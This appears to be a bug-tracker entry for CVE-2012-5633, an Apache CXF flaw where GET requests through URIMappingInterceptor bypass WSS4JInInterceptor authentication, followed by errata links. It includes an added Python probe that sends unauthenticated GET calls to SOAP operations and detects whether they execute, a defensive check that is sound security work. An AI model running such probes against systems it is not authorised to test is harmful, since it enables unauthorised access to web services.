If web services are deployed using Apache CXF with the WSS4JInInterceptor enabled to apply WS-Security processing, HTTP GET requests to these services will always be granted access, without applying authentication checks. The URIMappingInterceptor is a legacy mechanism for allowing REST-like access (via GET requests) to simple SOAP services. A remote attacker could use this flaw to access the REST-like interface of a simple SOAP service using GET requests that bypass the security constraints applied by WSS4JInInterceptor. This flaw is only exploitable if WSS4JInInterceptor is used to apply WS-Security processing. Services that use WS-SecurityPolicy to apply security are not affected.
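The following is an added example, not part of this bug report and not code from Apache CXF or JBoss: a small Python probe that sends the REST-like GET form the legacy URIMappingInterceptor maps onto a SOAP operation and classifies the answer, so that an operator can check whether an endpoint secured only by WSS4JInInterceptor executes calls that carry no wsse:Security header at all. Assumptions: the GET form `<endpoint>/<operation>?<param>=<value>` (the mapping shape of URIMappingInterceptor; verify against your CXF version), the endpoint URLs, the operation name `sayHi` and parameter `text`, and the sample responses, which are constructed rather than captured from a server.

```python
# Added example (not from the bug report or from Apache CXF): probe a SOAP
# endpoint for the CVE-2012-5633 behaviour by sending the REST-like GET form
# that URIMappingInterceptor maps onto an operation and checking whether the
# operation ran although no WS-Security header was presented.
import urllib.error
import urllib.request
from urllib.parse import urlencode
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"   # SOAP 1.1 envelope


def rest_style_url(endpoint, operation, params):
    """GET form accepted by URIMappingInterceptor: <endpoint>/<operation>?<name>=<value>.
    Assumed shape of the legacy mapping; verify against your CXF version."""
    return "%s/%s?%s" % (endpoint.rstrip("/"), operation, urlencode(params))


def http_get(url):
    """Plain GET with no SOAP body and no wsse:Security header; returns (status, body)."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.getcode(), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def classify_response(status, body):
    """Decide what the GET achieved.

    bypass     - 200 with a SOAP Envelope whose Body holds an operation response:
                 the service executed the call without any WS-Security header.
    enforced   - a SOAP Fault came back: the call was rejected before the operation
                 ran. Read the faultstring: an unrelated fault (bad parameter,
                 unknown operation) also lands here and is not proof of enforcement.
    not-mapped - no SOAP Envelope at all (404/405/HTML): there is no REST-like
                 interface on this path to test.
    """
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return "not-mapped", "non-XML response"
    if root.tag != "{%s}Envelope" % SOAP_NS:
        return "not-mapped", "non-SOAP response"
    soap_body = root.find("{%s}Body" % SOAP_NS)
    if soap_body is None or len(soap_body) == 0:
        return "not-mapped", "empty SOAP body"
    fault = soap_body.find("{%s}Fault" % SOAP_NS)
    if fault is not None:
        return "enforced", fault.findtext("faultstring", default="")
    if status == 200:
        return "bypass", soap_body[0].tag
    return "not-mapped", "HTTP %d with SOAP body" % status


def probe(endpoint, operation, params, fetch=http_get):
    """Run one GET probe; 'fetch' is injectable so constructed responses can be used offline."""
    url = rest_style_url(endpoint, operation, params)
    status, body = fetch(url)
    verdict, detail = classify_response(status, body)
    return {"url": url, "status": status, "verdict": verdict, "detail": detail}


# Constructed sample responses (not captured from a real server), keyed by probe URL.
SAMPLE_RESPONSES = {
    "http://localhost:9000/SoapContext/SoapPort/sayHi?text=hello": (200,
        '<soap:Envelope xmlns:soap="%s"><soap:Body>'
        '<ns2:sayHiResponse xmlns:ns2="http://example.invalid/hello">'
        '<return>Hello hello</return></ns2:sayHiResponse>'
        '</soap:Body></soap:Envelope>' % SOAP_NS),
    "http://localhost:9001/SoapContext/SoapPort/sayHi?text=hello": (500,
        '<soap:Envelope xmlns:soap="%s"><soap:Body><soap:Fault>'
        '<faultcode>soap:Server</faultcode>'
        '<faultstring>constructed sample: request rejected by WS-Security processing</faultstring>'
        '</soap:Fault></soap:Body></soap:Envelope>' % SOAP_NS),
    "http://localhost:9002/SoapContext/SoapPort/sayHi?text=hello": (404,
        "<html><body>Not Found</body></html>"),
}


def fake_fetch(url):
    """Offline stand-in for http_get that serves the constructed samples above."""
    return SAMPLE_RESPONSES[url]


if __name__ == "__main__":
    for port in (9000, 9001, 9002):
        r = probe("http://localhost:%d/SoapContext/SoapPort" % port, "sayHi",
                  {"text": "hello"}, fetch=fake_fetch)
        print("%-10s %s  %s" % (r["verdict"], r["url"], r["detail"]))
```

Run the probe only against an instance you are entitled to test. A "bypass" verdict for an endpoint whose only WS-Security enforcement is WSS4JInInterceptor reproduces the behaviour described above; an "enforced" verdict needs the faultstring checked before it counts as evidence, since any fault is classified that way. Endpoints that apply security through WS-SecurityPolicy are, per the description, not affected, so the probe is only meaningful for the WSS4JInInterceptor case.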
Upstream bug for JBoss Web Services: https://issues.jboss.org/browse/JBWS-3575
Upstream bug for Apache CXF: https://issues.apache.org/jira/browse/CXF-4629
Upstream patch commit for 2.6.x: http://svn.apache.org/viewvc?view=revision&revision=1420756
Upstream advisory: http://cxf.apache.org/cve-2012-5633.html
Created cxf tracking bugs for this issue
Affects: fedora-all [bug 909247]
This issue has been addressed in the following products:
  JBoss Enterprise Application Platform 5.2.0
Via RHSA-2013:0256 https://rhn.redhat.com/errata/RHSA-2013-0256.html

This issue has been addressed in the following products:
  JBEWP 5 for RHEL 4
  JBEWP 5 for RHEL 5
  JBEWP 5 for RHEL 6
Via RHSA-2013:0259 https://rhn.redhat.com/errata/RHSA-2013-0259.html

This issue has been addressed in the following products:
  JBoss Enterprise Web Platform 5.2.0
Via RHSA-2013:0258 https://rhn.redhat.com/errata/RHSA-2013-0258.html

This issue has been addressed in the following products:
  JBEAP 5 for RHEL 4
  JBEAP 5 for RHEL 5
  JBEAP 5 for RHEL 6
Via RHSA-2013:0257 https://rhn.redhat.com/errata/RHSA-2013-0257.html

This issue has been addressed in the following products:
  JBoss Enterprise Application Platform 6.0.1
Via RHSA-2013:0645 https://rhn.redhat.com/errata/RHSA-2013-0645.html

This issue has been addressed in the following products:
  JBEAP 6 for RHEL 5
  JBEAP 6 for RHEL 6
Via RHSA-2013:0644 https://rhn.redhat.com/errata/RHSA-2013-0644.html

This issue has been addressed in the following products:
  Fuse ESB Enterprise 7.1.0 Patch 3
Via RHSA-2013:0649 https://rhn.redhat.com/errata/RHSA-2013-0649.html

This issue has been addressed in the following products:
  JBoss Enterprise SOA Platform 5.3.1
Via RHSA-2013:0726 https://rhn.redhat.com/errata/RHSA-2013-0726.html

This issue has been addressed in the following products:
  JBoss Enterprise BRMS Platform 5.3.1
Via RHSA-2013:0743 https://rhn.redhat.com/errata/RHSA-2013-0743.html

This issue has been addressed in the following products:
  JBoss Portal Platform 6.0.0
Via RHSA-2013:0749 https://rhn.redhat.com/errata/RHSA-2013-0749.html